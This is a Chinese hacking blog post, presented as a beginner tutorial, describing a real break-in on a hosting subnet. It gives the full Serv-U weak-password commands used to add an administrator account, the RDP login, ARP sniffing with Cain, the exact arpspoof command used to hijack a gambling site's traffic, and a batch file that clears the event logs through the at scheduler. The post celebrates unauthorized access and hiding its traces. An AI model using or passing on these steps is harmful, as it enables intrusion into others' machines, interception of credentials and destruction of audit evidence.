注:本文适合新人学习.

前几天看上了一个SF发布的站点,被在它同一网段上发现有个赌博站.

(我最讨厌赌博站,害人的站点)

之后我看了一下那个SF发布站,本来想从这个站入手,但是做了防注,之后我又下了它论坛的YXBBS程序.可惜..............还是没搞下.

无奈....

旁注? 用工具检测不出有任何站点绑定在上面只好拿出最后的手段ARP或者嗅探了...

用流光扫了一下和他同段的机器.发现大多都开了3389.

又搞到一个servu6.3弱口令的机器. 老方法看看有执行权限没.

进入CMD

输入用户:admin

密码:123456

cd c:

竟然ok ,看来有希望

继续

cd windows

cd system32

进入到system32目录了

用queto site exec net.exe user xiaoshi xiaoshi /add

添加用户

queto site exec net.exe localgroup administrators xiaoshi /add

提升权限

ok

提示250.

登陆3389..........

目的是和这个肉鸡相隔4个IP的站 这个肉鸡的D段为13  目标为9

装上4.7汉化版的cain.(因为比较方便不像ARPSNIFFER需要多开窗口,但是容易被发现)

扫了一下MAC地址,发现很多,基本上 255个IP都是.

开始嗅吧....等者我们的肉鸡上来,哈哈....

等了将近一个小时截取到RDP数据10个 都没获得密码,或许是因为没有登陆只是用连接了一下吧

后来我嗅了一晚上,什么都没搞到,http到搞到不少截取了一个有用的密码 但是是40位的....无奈.

今天早上起来,首先去看一下肉鸡丢了没,没丢..

之后上传了arpspoof.exe 因为这段有赌博站.欺骗它.

进入cmd输入

arpspoof XXX.XX.XX.1 XXX.XX.XX.XXX.41(赌博站的IP) 80 0 1(1为单项欺骗) /r job.txt
开始欺骗,发送爆文.

打开站点开了一下,成功.

给我的感觉这段所有的机器都没做防ARP处理.....所以全部沦陷..... (大多都不是什么正规的站,基本上以赌博,色情为主的站)

感觉这次闹的挺大,我没做任何的跳板与代理.直接进入肉鸡的.如果被XXX

那我的青春就VOVER了

清除日志....

用ClearLogs.exe传到肉鸡上(我先开始用了ASM写的工具,貌似不好用)

建立了一个批处理

clearlogs -app
clearlogs -sec
clearlogs -sys
del clearlogs.exe
del c.bat
exit

我没上后门,所以只能用at命令了执行了

在CMD下输入at 8:40"C:\Documents and Settings\xiaoshi\桌面\clearlog\1.bat"

之后等到了8:38的时候我注销了用户 安全的退出.....